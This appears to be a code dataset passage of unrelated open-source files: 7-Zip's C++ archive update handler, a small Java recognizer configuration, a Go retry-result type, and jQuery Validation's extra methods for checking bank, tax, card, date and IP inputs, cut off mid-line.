else\n {\n ui.Name = NItemName::MakeLegalName(prop.bstrVal);\n nameIsDefined = true;\n }\n }\n {\n NCOM::CPropVariant prop;\n RINOK(updateCallback->GetProperty(i, kpidIsDir, &prop));\n if (prop.vt == VT_EMPTY)\n folderStatusIsDefined = false;\n else if (prop.vt != VT_BOOL)\n return E_INVALIDARG;\n else\n {\n ui.IsDir = (prop.boolVal != VARIANT_FALSE);\n folderStatusIsDefined = true;\n }\n }\n\n {\n NCOM::CPropVariant prop;\n RINOK(updateCallback->GetProperty(i, kpidIsAnti, &prop));\n if (prop.vt == VT_EMPTY)\n ui.IsAnti = false;\n else if (prop.vt != VT_BOOL)\n return E_INVALIDARG;\n else\n ui.IsAnti = (prop.boolVal != VARIANT_FALSE);\n }\n\n if (ui.IsAnti)\n {\n ui.AttribDefined = false;\n\n ui.CTimeDefined = false;\n ui.ATimeDefined = false;\n ui.MTimeDefined = false;\n \n ui.Size = 0;\n }\n\n if (!folderStatusIsDefined && ui.AttribDefined)\n ui.SetDirStatusFromAttrib();\n }\n\n if (ui.NewData)\n {\n NCOM::CPropVariant prop;\n RINOK(updateCallback->GetProperty(i, kpidSize, &prop));\n if (prop.vt != VT_UI8)\n return E_INVALIDARG;\n ui.Size = (UInt64)prop.uhVal.QuadPart;\n if (ui.Size != 0 && ui.IsAnti)\n return E_INVALIDARG;\n }\n updateItems.Add(ui);\n }\n\n CCompressionMethodMode methodMode, headerMethod;\n RINOK(SetCompressionMethod(methodMode, headerMethod));\n #ifndef _7ZIP_ST\n methodMode.NumThreads = _numThreads;\n headerMethod.NumThreads = 1;\n #endif\n\n CMyComPtr getPassword2;\n updateCallback->QueryInterface(IID_ICryptoGetTextPassword2, (void **)&getPassword2);\n\n if (getPassword2)\n {\n CMyComBSTR password;\n Int32 passwordIsDefined;\n RINOK(getPassword2->CryptoGetTextPassword2(&passwordIsDefined, &password));\n methodMode.PasswordIsDefined = IntToBool(passwordIsDefined);\n if (methodMode.PasswordIsDefined)\n methodMode.Password = password;\n }\n else\n methodMode.PasswordIsDefined = false;\n\n bool compressMainHeader = _compressHeaders; // check it\n\n bool encryptHeaders = false;\n\n if (methodMode.PasswordIsDefined)\n {\n if (_encryptHeadersSpecified)\n encryptHeaders = _encryptHeaders;\n #ifndef _NO_CRYPTO\n else\n encryptHeaders = _passwordIsDefined;\n #endif\n compressMainHeader = true;\n if (encryptHeaders)\n {\n headerMethod.PasswordIsDefined = methodMode.PasswordIsDefined;\n headerMethod.Password = methodMode.Password;\n }\n }\n\n if (numItems < 2)\n compressMainHeader = false;\n\n CUpdateOptions options;\n options.Method = &methodMode;\n options.HeaderMethod = (_compressHeaders || encryptHeaders) ? &headerMethod : 0;\n options.UseFilters = _level != 0 && _autoFilter;\n options.MaxFilter = _level >= 8;\n\n options.HeaderOptions.CompressMainHeader = compressMainHeader;\n options.HeaderOptions.WriteCTime = WriteCTime;\n options.HeaderOptions.WriteATime = WriteATime;\n options.HeaderOptions.WriteMTime = WriteMTime;\n \n options.NumSolidFiles = _numSolidFiles;\n options.NumSolidBytes = _numSolidBytes;\n options.SolidExtension = _solidExtension;\n options.RemoveSfxBlock = _removeSfxBlock;\n options.VolumeMode = _volumeMode;\n\n COutArchive archive;\n CArchiveDatabase newDatabase;\n\n CMyComPtr getPassword;\n updateCallback->QueryInterface(IID_ICryptoGetTextPassword, (void **)&getPassword);\n \n HRESULT res = Update(\n EXTERNAL_CODECS_VARS\n #ifdef _7Z_VOL\n volume ? volume->Stream: 0,\n volume ? db : 0,\n #else\n _inStream,\n db,\n #endif\n updateItems,\n archive, newDatabase, outStream, updateCallback, options\n #ifndef _NO_CRYPTO\n , getPassword\n #endif\n );\n\n RINOK(res);\n\n updateItems.ClearAndFree();\n\n return archive.WriteDatabase(EXTERNAL_CODECS_VARS\n newDatabase, options.HeaderMethod, options.HeaderOptions);\n\n COM_TRY_END\n}\n\nstatic HRESULT GetBindInfoPart(UString &srcString, UInt32 &coder, UInt32 &stream)\n{\n stream = 0;\n int index = ParseStringToUInt32(srcString, coder);\n if (index == 0)\n return E_INVALIDARG;\n srcString.Delete(0, index);\n if (srcString[0] == 'S')\n {\n srcString.Delete(0);\n int index = ParseStringToUInt32(srcString, stream);\n if (index == 0)\n return E_INVALIDARG;\n srcString.Delete(0, index);\n }\n return S_OK;\n}\n\nstatic HRESULT GetBindInfo(UString &srcString, CBind &bind)\n{\n RINOK(GetBindInfoPart(srcString, bind.OutCoder, bind.OutStream));\n if (srcString[0] != ':')\n return E_INVALIDARG;\n srcString.Delete(0);\n RINOK(GetBindInfoPart(srcString, bind.InCoder, bind.InStream));\n if (!srcString.IsEmpty())\n return E_INVALIDARG;\n return S_OK;\n}\n\nSTDMETHODIMP CHandler::SetProperties(const wchar_t **names, const PROPVARIANT *values, Int32 numProperties)\n{\n COM_TRY_BEGIN\n _binds.Clear();\n BeforeSetProperty();\n\n for (int i = 0; i < numProperties; i++)\n {\n UString name = names[i];\n name.MakeUpper();\n if (name.IsEmpty())\n return E_INVALIDARG;\n\n const PROPVARIANT &value = values[i];\n\n if (name[0] == 'B')\n {\n name.Delete(0);\n CBind bind;\n RINOK(GetBindInfo(name, bind));\n _binds.Add(bind);\n continue;\n }\n\n RINOK(SetProperty(name, value));\n }\n\n return S_OK;\n COM_TRY_END\n}\n\n}}\n"} {"text": "package com.microsoft.recognizers.text.numberwithunit.english.parsers;\n\nimport com.microsoft.recognizers.text.Culture;\nimport com.microsoft.recognizers.text.CultureInfo;\nimport com.microsoft.recognizers.text.numberwithunit.english.extractors.AgeExtractorConfiguration;\n\npublic class AgeParserConfiguration extends EnglishNumberWithUnitParserConfiguration {\n\n public AgeParserConfiguration() {\n this(new CultureInfo(Culture.English));\n }\n\n public AgeParserConfiguration(CultureInfo cultureInfo) {\n super(cultureInfo);\n\n this.bindDictionary(AgeExtractorConfiguration.AgeSuffixList);\n }\n}\n"} {"text": "package http\n\nimport (\n\t\"fmt\"\n\t\"time\"\n\n\t\"github.com/cloudevents/sdk-go/v2/protocol\"\n)\n\n// NewRetriesResult returns a http RetriesResult that should be used as\n// a transport.Result without retries\nfunc NewRetriesResult(result protocol.Result, retries int, startTime time.Time, attempts []protocol.Result) protocol.Result {\n\trr := &RetriesResult{\n\t\tResult: result,\n\t\tRetries: retries,\n\t\tDuration: time.Since(startTime),\n\t}\n\tif len(attempts) > 0 {\n\t\trr.Attempts = attempts\n\t}\n\treturn rr\n}\n\n// RetriesResult wraps the fields required to make adjustments for http Responses.\ntype RetriesResult struct {\n\t// The last result\n\tprotocol.Result\n\n\t// Retries is the number of times the request was tried\n\tRetries int\n\n\t// Duration records the time spent retrying. Exclude the successful request (if any)\n\tDuration time.Duration\n\n\t// Attempts of all failed requests. Exclude last result.\n\tAttempts []protocol.Result\n}\n\n// make sure RetriesResult implements error.\nvar _ error = (*RetriesResult)(nil)\n\n// Is returns if the target error is a RetriesResult type checking target.\nfunc (e *RetriesResult) Is(target error) bool {\n\treturn protocol.ResultIs(e.Result, target)\n}\n\n// Error returns the string that is formed by using the format string with the\n// provided args.\nfunc (e *RetriesResult) Error() string {\n\tif e.Retries == 0 {\n\t\treturn e.Result.Error()\n\t}\n\treturn fmt.Sprintf(\"%s (%dx)\", e.Result.Error(), e.Retries)\n}\n"} {"text": "/*!\n * jQuery Validation Plugin v1.14.0\n *\n * http://jqueryvalidation.org/\n *\n * Copyright (c) 2015 Jörn Zaefferer\n * Released under the MIT license\n */\n(function( factory ) {\n\tif ( typeof define === \"function\" && define.amd ) {\n\t\tdefine( [\"jquery\", \"./jquery.validate\"], factory );\n\t} else {\n\t\tfactory( jQuery );\n\t}\n}(function( $ ) {\n\n(function() {\n\n\tfunction stripHtml(value) {\n\t\t// remove html tags and space chars\n\t\treturn value.replace(/<.[^<>]*?>/g, \" \").replace(/ | /gi, \" \")\n\t\t// remove punctuation\n\t\t.replace(/[.(),;:!?%#$'\\\"_+=\\/\\-“”’]*/g, \"\");\n\t}\n\n\t$.validator.addMethod(\"maxWords\", function(value, element, params) {\n\t\treturn this.optional(element) || stripHtml(value).match(/\\b\\w+\\b/g).length <= params;\n\t}, $.validator.format(\"Please enter {0} words or less.\"));\n\n\t$.validator.addMethod(\"minWords\", function(value, element, params) {\n\t\treturn this.optional(element) || stripHtml(value).match(/\\b\\w+\\b/g).length >= params;\n\t}, $.validator.format(\"Please enter at least {0} words.\"));\n\n\t$.validator.addMethod(\"rangeWords\", function(value, element, params) {\n\t\tvar valueStripped = stripHtml(value),\n\t\t\tregex = /\\b\\w+\\b/g;\n\t\treturn this.optional(element) || valueStripped.match(regex).length >= params[0] && valueStripped.match(regex).length <= params[1];\n\t}, $.validator.format(\"Please enter between {0} and {1} words.\"));\n\n}());\n\n// Accept a value from a file input based on a required mimetype\n$.validator.addMethod(\"accept\", function(value, element, param) {\n\t// Split mime on commas in case we have multiple types we can accept\n\tvar typeParam = typeof param === \"string\" ? param.replace(/\\s/g, \"\").replace(/,/g, \"|\") : \"image/*\",\n\toptionalValue = this.optional(element),\n\ti, file;\n\n\t// Element is optional\n\tif (optionalValue) {\n\t\treturn optionalValue;\n\t}\n\n\tif ($(element).attr(\"type\") === \"file\") {\n\t\t// If we are using a wildcard, make it regex friendly\n\t\ttypeParam = typeParam.replace(/\\*/g, \".*\");\n\n\t\t// Check if the element has a FileList before checking each file\n\t\tif (element.files && element.files.length) {\n\t\t\tfor (i = 0; i < element.files.length; i++) {\n\t\t\t\tfile = element.files[i];\n\n\t\t\t\t// Grab the mimetype from the loaded file, verify it matches\n\t\t\t\tif (!file.type.match(new RegExp( \"\\\\.?(\" + typeParam + \")$\", \"i\"))) {\n\t\t\t\t\treturn false;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\t// Either return true because we've validated each file, or because the\n\t// browser does not support element.files and the FileList feature\n\treturn true;\n}, $.validator.format(\"Please enter a value with a valid mimetype.\"));\n\n$.validator.addMethod(\"alphanumeric\", function(value, element) {\n\treturn this.optional(element) || /^\\w+$/i.test(value);\n}, \"Letters, numbers, and underscores only please\");\n\n/*\n * Dutch bank account numbers (not 'giro' numbers) have 9 digits\n * and pass the '11 check'.\n * We accept the notation with spaces, as that is common.\n * acceptable: 123456789 or 12 34 56 789\n */\n$.validator.addMethod(\"bankaccountNL\", function(value, element) {\n\tif (this.optional(element)) {\n\t\treturn true;\n\t}\n\tif (!(/^[0-9]{9}|([0-9]{2} ){3}[0-9]{3}$/.test(value))) {\n\t\treturn false;\n\t}\n\t// now '11 check'\n\tvar account = value.replace(/ /g, \"\"), // remove spaces\n\t\tsum = 0,\n\t\tlen = account.length,\n\t\tpos, factor, digit;\n\tfor ( pos = 0; pos < len; pos++ ) {\n\t\tfactor = len - pos;\n\t\tdigit = account.substring(pos, pos + 1);\n\t\tsum = sum + factor * digit;\n\t}\n\treturn sum % 11 === 0;\n}, \"Please specify a valid bank account number\");\n\n$.validator.addMethod(\"bankorgiroaccountNL\", function(value, element) {\n\treturn this.optional(element) ||\n\t\t\t($.validator.methods.bankaccountNL.call(this, value, element)) ||\n\t\t\t($.validator.methods.giroaccountNL.call(this, value, element));\n}, \"Please specify a valid bank or giro account number\");\n\n/**\n * BIC is the business identifier code (ISO 9362). This BIC check is not a guarantee for authenticity.\n *\n * BIC pattern: BBBBCCLLbbb (8 or 11 characters long; bbb is optional)\n *\n * BIC definition in detail:\n * - First 4 characters - bank code (only letters)\n * - Next 2 characters - ISO 3166-1 alpha-2 country code (only letters)\n * - Next 2 characters - location code (letters and digits)\n * a. shall not start with '0' or '1'\n * b. second character must be a letter ('O' is not allowed) or one of the following digits ('0' for test (therefore not allowed), '1' for passive participant and '2' for active participant)\n * - Last 3 characters - branch code, optional (shall not start with 'X' except in case of 'XXX' for primary office) (letters and digits)\n */\n$.validator.addMethod(\"bic\", function(value, element) {\n return this.optional( element ) || /^([A-Z]{6}[A-Z2-9][A-NP-Z1-2])(X{3}|[A-WY-Z0-9][A-Z0-9]{2})?$/.test( value );\n}, \"Please specify a valid BIC code\");\n\n/*\n * Código de identificación fiscal ( CIF ) is the tax identification code for Spanish legal entities\n * Further rules can be found in Spanish on http://es.wikipedia.org/wiki/C%C3%B3digo_de_identificaci%C3%B3n_fiscal\n */\n$.validator.addMethod( \"cifES\", function( value ) {\n\t\"use strict\";\n\n\tvar num = [],\n\t\tcontrolDigit, sum, i, count, tmp, secondDigit;\n\n\tvalue = value.toUpperCase();\n\n\t// Quick format test\n\tif ( !value.match( \"((^[A-Z]{1}[0-9]{7}[A-Z0-9]{1}$|^[T]{1}[A-Z0-9]{8}$)|^[0-9]{8}[A-Z]{1}$)\" ) ) {\n\t\treturn false;\n\t}\n\n\tfor ( i = 0; i < 9; i++ ) {\n\t\tnum[ i ] = parseInt( value.charAt( i ), 10 );\n\t}\n\n\t// Algorithm for checking CIF codes\n\tsum = num[ 2 ] + num[ 4 ] + num[ 6 ];\n\tfor ( count = 1; count < 8; count += 2 ) {\n\t\ttmp = ( 2 * num[ count ] ).toString();\n\t\tsecondDigit = tmp.charAt( 1 );\n\n\t\tsum += parseInt( tmp.charAt( 0 ), 10 ) + ( secondDigit === \"\" ? 0 : parseInt( secondDigit, 10 ) );\n\t}\n\n\t/* The first (position 1) is a letter following the following criteria:\n\t *\tA. Corporations\n\t *\tB. LLCs\n\t *\tC. General partnerships\n\t *\tD. Companies limited partnerships\n\t *\tE. Communities of goods\n\t *\tF. Cooperative Societies\n\t *\tG. Associations\n\t *\tH. Communities of homeowners in horizontal property regime\n\t *\tJ. Civil Societies\n\t *\tK. Old format\n\t *\tL. Old format\n\t *\tM. Old format\n\t *\tN. Nonresident entities\n\t *\tP. Local authorities\n\t *\tQ. Autonomous bodies, state or not, and the like, and congregations and religious institutions\n\t *\tR. Congregations and religious institutions (since 2008 ORDER EHA/451/2008)\n\t *\tS. Organs of State Administration and regions\n\t *\tV. Agrarian Transformation\n\t *\tW. Permanent establishments of non-resident in Spain\n\t */\n\tif ( /^[ABCDEFGHJNPQRSUVW]{1}/.test( value ) ) {\n\t\tsum += \"\";\n\t\tcontrolDigit = 10 - parseInt( sum.charAt( sum.length - 1 ), 10 );\n\t\tvalue += controlDigit;\n\t\treturn ( num[ 8 ].toString() === String.fromCharCode( 64 + controlDigit ) || num[ 8 ].toString() === value.charAt( value.length - 1 ) );\n\t}\n\n\treturn false;\n\n}, \"Please specify a valid CIF number.\" );\n\n/*\n * Brazillian CPF number (Cadastrado de Pessoas Físicas) is the equivalent of a Brazilian tax registration number.\n * CPF numbers have 11 digits in total: 9 numbers followed by 2 check numbers that are being used for validation.\n */\n$.validator.addMethod(\"cpfBR\", function(value) {\n\t// Removing special characters from value\n\tvalue = value.replace(/([~!@#$%^&*()_+=`{}\\[\\]\\-|\\\\:;'<>,.\\/? ])+/g, \"\");\n\n\t// Checking value to have 11 digits only\n\tif (value.length !== 11) {\n\t\treturn false;\n\t}\n\n\tvar sum = 0,\n\t\tfirstCN, secondCN, checkResult, i;\n\n\tfirstCN = parseInt(value.substring(9, 10), 10);\n\tsecondCN = parseInt(value.substring(10, 11), 10);\n\n\tcheckResult = function(sum, cn) {\n\t\tvar result = (sum * 10) % 11;\n\t\tif ((result === 10) || (result === 11)) {result = 0;}\n\t\treturn (result === cn);\n\t};\n\n\t// Checking for dump data\n\tif (value === \"\" ||\n\t\tvalue === \"00000000000\" ||\n\t\tvalue === \"11111111111\" ||\n\t\tvalue === \"22222222222\" ||\n\t\tvalue === \"33333333333\" ||\n\t\tvalue === \"44444444444\" ||\n\t\tvalue === \"55555555555\" ||\n\t\tvalue === \"66666666666\" ||\n\t\tvalue === \"77777777777\" ||\n\t\tvalue === \"88888888888\" ||\n\t\tvalue === \"99999999999\"\n\t) {\n\t\treturn false;\n\t}\n\n\t// Step 1 - using first Check Number:\n\tfor ( i = 1; i <= 9; i++ ) {\n\t\tsum = sum + parseInt(value.substring(i - 1, i), 10) * (11 - i);\n\t}\n\n\t// If first Check Number (CN) is valid, move to Step 2 - using second Check Number:\n\tif ( checkResult(sum, firstCN) ) {\n\t\tsum = 0;\n\t\tfor ( i = 1; i <= 10; i++ ) {\n\t\t\tsum = sum + parseInt(value.substring(i - 1, i), 10) * (12 - i);\n\t\t}\n\t\treturn checkResult(sum, secondCN);\n\t}\n\treturn false;\n\n}, \"Please specify a valid CPF number\");\n\n/* NOTICE: Modified version of Castle.Components.Validator.CreditCardValidator\n * Redistributed under the the Apache License 2.0 at http://www.apache.org/licenses/LICENSE-2.0\n * Valid Types: mastercard, visa, amex, dinersclub, enroute, discover, jcb, unknown, all (overrides all other settings)\n */\n$.validator.addMethod(\"creditcardtypes\", function(value, element, param) {\n\tif (/[^0-9\\-]+/.test(value)) {\n\t\treturn false;\n\t}\n\n\tvalue = value.replace(/\\D/g, \"\");\n\n\tvar validTypes = 0x0000;\n\n\tif (param.mastercard) {\n\t\tvalidTypes |= 0x0001;\n\t}\n\tif (param.visa) {\n\t\tvalidTypes |= 0x0002;\n\t}\n\tif (param.amex) {\n\t\tvalidTypes |= 0x0004;\n\t}\n\tif (param.dinersclub) {\n\t\tvalidTypes |= 0x0008;\n\t}\n\tif (param.enroute) {\n\t\tvalidTypes |= 0x0010;\n\t}\n\tif (param.discover) {\n\t\tvalidTypes |= 0x0020;\n\t}\n\tif (param.jcb) {\n\t\tvalidTypes |= 0x0040;\n\t}\n\tif (param.unknown) {\n\t\tvalidTypes |= 0x0080;\n\t}\n\tif (param.all) {\n\t\tvalidTypes = 0x0001 | 0x0002 | 0x0004 | 0x0008 | 0x0010 | 0x0020 | 0x0040 | 0x0080;\n\t}\n\tif (validTypes & 0x0001 && /^(5[12345])/.test(value)) { //mastercard\n\t\treturn value.length === 16;\n\t}\n\tif (validTypes & 0x0002 && /^(4)/.test(value)) { //visa\n\t\treturn value.length === 16;\n\t}\n\tif (validTypes & 0x0004 && /^(3[47])/.test(value)) { //amex\n\t\treturn value.length === 15;\n\t}\n\tif (validTypes & 0x0008 && /^(3(0[012345]|[68]))/.test(value)) { //dinersclub\n\t\treturn value.length === 14;\n\t}\n\tif (validTypes & 0x0010 && /^(2(014|149))/.test(value)) { //enroute\n\t\treturn value.length === 15;\n\t}\n\tif (validTypes & 0x0020 && /^(6011)/.test(value)) { //discover\n\t\treturn value.length === 16;\n\t}\n\tif (validTypes & 0x0040 && /^(3)/.test(value)) { //jcb\n\t\treturn value.length === 16;\n\t}\n\tif (validTypes & 0x0040 && /^(2131|1800)/.test(value)) { //jcb\n\t\treturn value.length === 15;\n\t}\n\tif (validTypes & 0x0080) { //unknown\n\t\treturn true;\n\t}\n\treturn false;\n}, \"Please enter a valid credit card number.\");\n\n/**\n * Validates currencies with any given symbols by @jameslouiz\n * Symbols can be optional or required. Symbols required by default\n *\n * Usage examples:\n * currency: [\"£\", false] - Use false for soft currency validation\n * currency: [\"$\", false]\n * currency: [\"RM\", false] - also works with text based symbols such as \"RM\" - Malaysia Ringgit etc\n *\n * \n *\n * Soft symbol checking\n * currencyInput: {\n * currency: [\"$\", false]\n * }\n *\n * Strict symbol checking (default)\n * currencyInput: {\n * currency: \"$\"\n * //OR\n * currency: [\"$\", true]\n * }\n *\n * Multiple Symbols\n * currencyInput: {\n * currency: \"$,£,¢\"\n * }\n */\n$.validator.addMethod(\"currency\", function(value, element, param) {\n var isParamString = typeof param === \"string\",\n symbol = isParamString ? param : param[0],\n soft = isParamString ? true : param[1],\n regex;\n\n symbol = symbol.replace(/,/g, \"\");\n symbol = soft ? symbol + \"]\" : symbol + \"]?\";\n regex = \"^[\" + symbol + \"([1-9]{1}[0-9]{0,2}(\\\\,[0-9]{3})*(\\\\.[0-9]{0,2})?|[1-9]{1}[0-9]{0,}(\\\\.[0-9]{0,2})?|0(\\\\.[0-9]{0,2})?|(\\\\.[0-9]{1,2})?)$\";\n regex = new RegExp(regex);\n return this.optional(element) || regex.test(value);\n\n}, \"Please specify a valid currency\");\n\n$.validator.addMethod(\"dateFA\", function(value, element) {\n\treturn this.optional(element) || /^[1-4]\\d{3}\\/((0?[1-6]\\/((3[0-1])|([1-2][0-9])|(0?[1-9])))|((1[0-2]|(0?[7-9]))\\/(30|([1-2][0-9])|(0?[1-9]))))$/.test(value);\n}, $.validator.messages.date);\n\n/**\n * Return true, if the value is a valid date, also making this formal check dd/mm/yyyy.\n *\n * @example $.validator.methods.date(\"01/01/1900\")\n * @result true\n *\n * @example $.validator.methods.date(\"01/13/1990\")\n * @result false\n *\n * @example $.validator.methods.date(\"01.01.1900\")\n * @result false\n *\n * @example \n * @desc Declares an optional input element whose value must be a valid date.\n *\n * @name $.validator.methods.dateITA\n * @type Boolean\n * @cat Plugins/Validate/Methods\n */\n$.validator.addMethod(\"dateITA\", function(value, element) {\n\tvar check = false,\n\t\tre = /^\\d{1,2}\\/\\d{1,2}\\/\\d{4}$/,\n\t\tadata, gg, mm, aaaa, xdata;\n\tif ( re.test(value)) {\n\t\tadata = value.split(\"/\");\n\t\tgg = parseInt(adata[0], 10);\n\t\tmm = parseInt(adata[1], 10);\n\t\taaaa = parseInt(adata[2], 10);\n\t\txdata = new Date(Date.UTC(aaaa, mm - 1, gg, 12, 0, 0, 0));\n\t\tif ( ( xdata.getUTCFullYear() === aaaa ) && ( xdata.getUTCMonth () === mm - 1 ) && ( xdata.getUTCDate() === gg ) ) {\n\t\t\tcheck = true;\n\t\t} else {\n\t\t\tcheck = false;\n\t\t}\n\t} else {\n\t\tcheck = false;\n\t}\n\treturn this.optional(element) || check;\n}, $.validator.messages.date);\n\n$.validator.addMethod(\"dateNL\", function(value, element) {\n\treturn this.optional(element) || /^(0?[1-9]|[12]\\d|3[01])[\\.\\/\\-](0?[1-9]|1[012])[\\.\\/\\-]([12]\\d)?(\\d\\d)$/.test(value);\n}, $.validator.messages.date);\n\n// Older \"accept\" file extension method. Old docs: http://docs.jquery.com/Plugins/Validation/Methods/accept\n$.validator.addMethod(\"extension\", function(value, element, param) {\n\tparam = typeof param === \"string\" ? param.replace(/,/g, \"|\") : \"png|jpe?g|gif\";\n\treturn this.optional(element) || value.match(new RegExp(\"\\\\.(\" + param + \")$\", \"i\"));\n}, $.validator.format(\"Please enter a value with a valid extension.\"));\n\n/**\n * Dutch giro account numbers (not bank numbers) have max 7 digits\n */\n$.validator.addMethod(\"giroaccountNL\", function(value, element) {\n\treturn this.optional(element) || /^[0-9]{1,7}$/.test(value);\n}, \"Please specify a valid giro account number\");\n\n/**\n * IBAN is the international bank account number.\n * It has a country - specific format, that is checked here too\n */\n$.validator.addMethod(\"iban\", function(value, element) {\n\t// some quick simple tests to prevent needless work\n\tif (this.optional(element)) {\n\t\treturn true;\n\t}\n\n\t// remove spaces and to upper case\n\tvar iban = value.replace(/ /g, \"\").toUpperCase(),\n\t\tibancheckdigits = \"\",\n\t\tleadingZeroes = true,\n\t\tcRest = \"\",\n\t\tcOperator = \"\",\n\t\tcountrycode, ibancheck, charAt, cChar, bbanpattern, bbancountrypatterns, ibanregexp, i, p;\n\n\t// check the country code and find the country specific format\n\tcountrycode = iban.substring(0, 2);\n\tbbancountrypatterns = {\n\t\t\"AL\": \"\\\\d{8}[\\\\dA-Z]{16}\",\n\t\t\"AD\": \"\\\\d{8}[\\\\dA-Z]{12}\",\n\t\t\"AT\": \"\\\\d{16}\",\n\t\t\"AZ\": \"[\\\\dA-Z]{4}\\\\d{20}\",\n\t\t\"BE\": \"\\\\d{12}\",\n\t\t\"BH\": \"[A-Z]{4}[\\\\dA-Z]{14}\",\n\t\t\"BA\": \"\\\\d{16}\",\n\t\t\"BR\": \"\\\\d{23}[A-Z][\\\\dA-Z]\",\n\t\t\"BG\": \"[A-Z]{4}\\\\d{6}[\\\\dA-Z]{8}\",\n\t\t\"CR\": \"\\\\d{17}\",\n\t\t\"HR\": \"\\\\d{17}\",\n\t\t\"CY\": \"\\\\d{8}[\\\\dA-Z]{16}\",\n\t\t\"CZ\": \"\\\\d{20}\",\n\t\t\"DK\": \"\\\\d{14}\",\n\t\t\"DO\": \"[A-Z]{4}\\\\d{20}\",\n\t\t\"EE\": \"\\\\d{16}\",\n\t\t\"FO\": \"\\\\d{14}\",\n\t\t\"FI\": \"\\\\d{14}\",\n\t\t\"FR\": \"\\\\d{10}[\\\\dA-Z]{11}\\\\d{2}\",\n\t\t\"GE\": \"[\\\\dA-Z]{2}\\\\d{16}\",\n\t\t\"DE\": \"\\\\d{18}\",\n\t\t\"GI\": \"[A-Z]{4}[\\\\dA-Z]{15}\",\n\t\t\"GR\": \"\\\\d{7}[\\\\dA-Z]{16}\",\n\t\t\"GL\": \"\\\\d{14}\",\n\t\t\"GT\": \"[\\\\dA-Z]{4}[\\\\dA-Z]{20}\",\n\t\t\"HU\": \"\\\\d{24}\",\n\t\t\"IS\": \"\\\\d{22}\",\n\t\t\"IE\": \"[\\\\dA-Z]{4}\\\\d{14}\",\n\t\t\"IL\": \"\\\\d{19}\",\n\t\t\"IT\": \"[A-Z]\\\\d{10}[\\\\dA-Z]{12}\",\n\t\t\"KZ\": \"\\\\d{3}[\\\\dA-Z]{13}\",\n\t\t\"KW\": \"[A-Z]{4}[\\\\dA-Z]{22}\",\n\t\t\"LV\": \"[A-Z]{4}[\\\\dA-Z]{13}\",\n\t\t\"LB\": \"\\\\d{4}[\\\\dA-Z]{20}\",\n\t\t\"LI\": \"\\\\d{5}[\\\\dA-Z]{12}\",\n\t\t\"LT\": \"\\\\d{16}\",\n\t\t\"LU\": \"\\\\d{3}[\\\\dA-Z]{13}\",\n\t\t\"MK\": \"\\\\d{3}[\\\\dA-Z]{10}\\\\d{2}\",\n\t\t\"MT\": \"[A-Z]{4}\\\\d{5}[\\\\dA-Z]{18}\",\n\t\t\"MR\": \"\\\\d{23}\",\n\t\t\"MU\": \"[A-Z]{4}\\\\d{19}[A-Z]{3}\",\n\t\t\"MC\": \"\\\\d{10}[\\\\dA-Z]{11}\\\\d{2}\",\n\t\t\"MD\": \"[\\\\dA-Z]{2}\\\\d{18}\",\n\t\t\"ME\": \"\\\\d{18}\",\n\t\t\"NL\": \"[A-Z]{4}\\\\d{10}\",\n\t\t\"NO\": \"\\\\d{11}\",\n\t\t\"PK\": \"[\\\\dA-Z]{4}\\\\d{16}\",\n\t\t\"PS\": \"[\\\\dA-Z]{4}\\\\d{21}\",\n\t\t\"PL\": \"\\\\d{24}\",\n\t\t\"PT\": \"\\\\d{21}\",\n\t\t\"RO\": \"[A-Z]{4}[\\\\dA-Z]{16}\",\n\t\t\"SM\": \"[A-Z]\\\\d{10}[\\\\dA-Z]{12}\",\n\t\t\"SA\": \"\\\\d{2}[\\\\dA-Z]{18}\",\n\t\t\"RS\": \"\\\\d{18}\",\n\t\t\"SK\": \"\\\\d{20}\",\n\t\t\"SI\": \"\\\\d{15}\",\n\t\t\"ES\": \"\\\\d{20}\",\n\t\t\"SE\": \"\\\\d{20}\",\n\t\t\"CH\": \"\\\\d{5}[\\\\dA-Z]{12}\",\n\t\t\"TN\": \"\\\\d{20}\",\n\t\t\"TR\": \"\\\\d{5}[\\\\dA-Z]{17}\",\n\t\t\"AE\": \"\\\\d{3}\\\\d{16}\",\n\t\t\"GB\": \"[A-Z]{4}\\\\d{14}\",\n\t\t\"VG\": \"[\\\\dA-Z]{4}\\\\d{16}\"\n\t};\n\n\tbbanpattern = bbancountrypatterns[countrycode];\n\t// As new countries will start using IBAN in the\n\t// future, we only check if the countrycode is known.\n\t// This prevents false negatives, while almost all\n\t// false positives introduced by this, will be caught\n\t// by the checksum validation below anyway.\n\t// Strict checking should return FALSE for unknown\n\t// countries.\n\tif (typeof bbanpattern !== \"undefined\") {\n\t\tibanregexp = new RegExp(\"^[A-Z]{2}\\\\d{2}\" + bbanpattern + \"$\", \"\");\n\t\tif (!(ibanregexp.test(iban))) {\n\t\t\treturn false; // invalid country specific format\n\t\t}\n\t}\n\n\t// now check the checksum, first convert to digits\n\tibancheck = iban.substring(4, iban.length) + iban.substring(0, 4);\n\tfor (i = 0; i < ibancheck.length; i++) {\n\t\tcharAt = ibancheck.charAt(i);\n\t\tif (charAt !== \"0\") {\n\t\t\tleadingZeroes = false;\n\t\t}\n\t\tif (!leadingZeroes) {\n\t\t\tibancheckdigits += \"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ\".indexOf(charAt);\n\t\t}\n\t}\n\n\t// calculate the result of: ibancheckdigits % 97\n\tfor (p = 0; p < ibancheckdigits.length; p++) {\n\t\tcChar = ibancheckdigits.charAt(p);\n\t\tcOperator = \"\" + cRest + \"\" + cChar;\n\t\tcRest = cOperator % 97;\n\t}\n\treturn cRest === 1;\n}, \"Please specify a valid IBAN\");\n\n$.validator.addMethod(\"integer\", function(value, element) {\n\treturn this.optional(element) || /^-?\\d+$/.test(value);\n}, \"A positive or negative non-decimal number please\");\n\n$.validator.addMethod(\"ipv4\", function(value, element) {\n\treturn this.optional(element) || /^(25[0-5]|2[0-4]\\d|[01]?\\d\\d?)\\.(25[0-5]|2[0-4]\\d|[01]?\\d\\d?)\\.(25[0-5]|2[0-4]\\d|[01]?\\d\\d?)\\.(25[0-5]|2[0-4]\\d|[01]?\\d\\d?)$/i.test(value);\n}, \"Please enter a valid IP v4 address.\");\n\n$.validator.addMethod(\"ipv6\", function(value, element) {\n\treturn this.optional(element) || 